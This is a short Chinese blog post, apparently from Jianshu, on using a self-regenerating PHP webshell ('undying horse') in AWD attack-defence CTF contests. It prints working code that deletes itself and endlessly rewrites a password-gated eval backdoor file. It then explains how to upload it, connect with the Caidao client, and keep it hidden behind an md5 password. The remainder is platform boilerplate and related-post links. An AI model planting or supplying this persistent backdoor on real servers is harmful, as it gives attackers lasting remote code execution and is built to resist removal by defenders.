awd中的不死馬使用

<?php 
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '2.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
while (1){
    file_put_contents($file,$code);
    usleep(5000);
}
?>

在awd中不死馬對于持續獲取用戶權限是十分有幫助的,將這個文件上傳到服務器,然后進行訪問,會在該路徑下一直生成一個名字為2.php的shell文件,然后使用caidao輸入http://xxx/2.php?pass=pass的路徑,密碼為a就可以鏈接一句話,由于pass是md5加密很難被破解也可以做到隱蔽,md5值可以隨意定義。

?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容

  • Ubuntu的發音 Ubuntu,源于非洲祖魯人和科薩人的語言,發作 oo-boon-too 的音。了解發音是有意...
    螢火蟲de夢閱讀 99,467評論 9 467
  • Android 自定義View的各種姿勢1 Activity的顯示之ViewRootImpl詳解 Activity...
    passiontim閱讀 172,841評論 25 708
  • linux資料總章2.1 1.0寫的不好抱歉 但是2.0已經改了很多 但是錯誤還是無法避免 以后資料會慢慢更新 大...
    數據革命閱讀 12,203評論 2 33
  • 一、SQL注入(注入) 1. 利用場景 從攻擊者進行SQL注入的階段來看,一般分為探測與攻擊兩個階段(p.s.攻擊...
    LizPL閱讀 2,392評論 0 0
  • 今天我像往常一樣找文章讀,看到感興趣的偶爾評論一下??墒牵刻煳叶甲x著不同的東西,趣味十足。然而突然間發現,我
    所謂的讀客閱讀 255評論 0 1